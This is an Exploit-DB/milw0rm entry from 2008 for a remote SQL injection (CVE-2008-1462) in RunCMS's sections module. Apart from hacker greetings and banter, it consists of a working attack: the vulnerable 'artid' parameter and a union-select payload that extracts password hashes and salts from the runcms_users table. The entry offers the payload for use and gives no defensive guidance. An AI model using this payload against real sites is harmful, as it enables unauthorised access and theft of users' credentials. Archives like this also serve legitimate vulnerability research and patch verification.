RunCMS Module section artid Remote SQL Injection Vulnerability

2008-03-20T00:00:00
ID EDB-ID:5285
Type exploitdb
Reporter Cr@zy_King
Modified 2008-03-20T00:00:00

Description

RunCMS Module section (artid) Remote SQL Injection Vulnerability. CVE-2008-1462. Webapps exploit for php platform

                                        
                                            Cr@zy_King

crazy_kinq@hotmail.co.uk / hackshow.us

Grtz : Crackers_Child - str0ke - 3php - Alemin_Krali - Eno7 - DreamTurk - The_Bekir - Mhzr91

Runcms Module Section (artid) Remote Sql Ä°nj. Vuln.

Example :

 - modules/sections/index.php?op=viewarticle&artid=Sql

 - Sql : 1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2

Cr@ Says : Kurtlar Vadisinde Memati Ölmeyecek kimse heyecanlanmasın :D

Alemin_Krali Says : Aynen katılıyorum (ne alaka ise a.q)

Good.

# milw0rm.com [2008-03-20]